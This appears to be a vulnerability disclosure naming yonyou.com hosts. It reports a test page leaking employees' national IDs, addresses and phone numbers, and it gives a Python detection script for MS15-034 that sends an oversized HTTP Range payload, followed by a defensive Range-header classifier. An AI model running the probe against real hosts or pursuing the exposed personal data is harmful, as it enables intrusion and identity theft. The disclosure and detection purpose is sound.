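### Brief description:
Information leaked: name / gender / date of birth / office phone / ethnicity / home address / national ID number / email / private phone / mobile number. That is enough to open a bank card or recover an Alipay password...
### Details: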
```
http://li.yonyou.com/test.aspx
```
Information leaked: name / gender / date of birth / office phone / ethnicity / home address / national ID number / email / private phone / mobile number
![1.png](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png)
In addition, several hosts are affected by the MS15-034 HTTP.sys remote code execution vulnerability:
```
http://h.yonyou.com/
http://hr.yonyou.com/
http://q.yonyou.com/
```
Detection PoC:
```
#!/usr/bin/env python3
# MS15-034 (HTTP.sys) detection check
__author__ = 'jastra'

import sys


class bg_colors:
    # ANSI color escape codes for terminal output
    VULN = '\033[92m'
    NONVULN = '\033[95m'
    EXPLOIT = '\033[91m'


try:
    import requests
except ImportError as ierr:
    print(bg_colors.EXPLOIT + "Error, looks like you don't have %s installed" % ierr)
    sys.exit(1)


def identify_iis(domain):
    # Fingerprint the target from its Server response header
    req = requests.get(str(domain))
    remote_server = req.headers.get('server', '')
    if "Microsoft-IIS" in remote_server:
        print(bg_colors.VULN + "[+] 服务是 " + remote_server)
        ms15_034_test(str(domain))
    else:
        print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)


def ms15_034_test(domain):
    print(" 启动vuln检查!")
    # Send the oversized byte range as a real Range request header
    # (the original passed a raw request string as URL parameters)
    vuln_headers = {"Range": "bytes=0-18446744073709551615"}
    req = requests.get(str(domain), headers=vuln_headers)
    # An unpatched HTTP.sys answers with 416 Requested Range Not Satisfiable
    if req.status_code == 416:
        print(bg_colors.EXPLOIT + "[+] 存在漏洞")
    else:
        print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. " +
              "需要手动检测")


if __name__ == "__main__":
    usr_domain = input("输入域名扫描: ")
    identify_iis(usr_domain)
```
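A defender-side counterpart to the check above, as an added example that is not part of the original report: it parses `Range` headers the way a reverse-proxy or IDS hook might and flags byte ranges with implausibly large bounds, such as the `18446744073709551615` value used in the PoC. The function names, the `2**53` limit and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumed policy limit (not from the report): no served resource exceeds 2**53 bytes.
MAX_SANE_OFFSET = 2**53
_RANGE_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)
_SPEC_RE = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def _too_big(bound):
    # Length test first, so absurdly long digit strings are never converted.
    return bool(bound) and (len(bound.lstrip("0")) > 20 or int(bound) > MAX_SANE_OFFSET)

def classify_range(value):
    """Return 'ok', 'malformed' or 'suspicious' for one Range header value."""
    m = _RANGE_RE.match(value)
    if not m:
        return "malformed"
    verdicts = set()
    for spec in m.group(1).split(","):
        s = _SPEC_RE.match(spec)
        if not s or not (s.group(1) or s.group(2)):
            verdicts.add("malformed")          # e.g. "bytes=-" or non-numeric bounds
        elif _too_big(s.group(1)) or _too_big(s.group(2)):
            verdicts.add("suspicious")         # bound near or beyond 64-bit limits
        elif s.group(1) and s.group(2) and int(s.group(1)) > int(s.group(2)):
            verdicts.add("malformed")          # first byte position after last
    for v in ("suspicious", "malformed"):
        if v in verdicts:
            return v
    return "ok"

def scan_request(raw):
    """Classify every Range header found in a raw HTTP request (bytes)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [classify_range(value.strip())
            for name, _, value in (l.partition(":") for l in head.split("\r\n")[1:])
            if name.strip().lower() == "range"]

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET /a.zip HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-1023\r\n\r\n",
    "probe": b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "suffix": b"GET / HTTP/1.1\r\nHost: example.test\r\nRange: bytes=-500\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, scan_request(raw))
```

Requests classified as `suspicious` can be logged or rejected before they reach an IIS backend.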
### Proof of vulnerability:
As above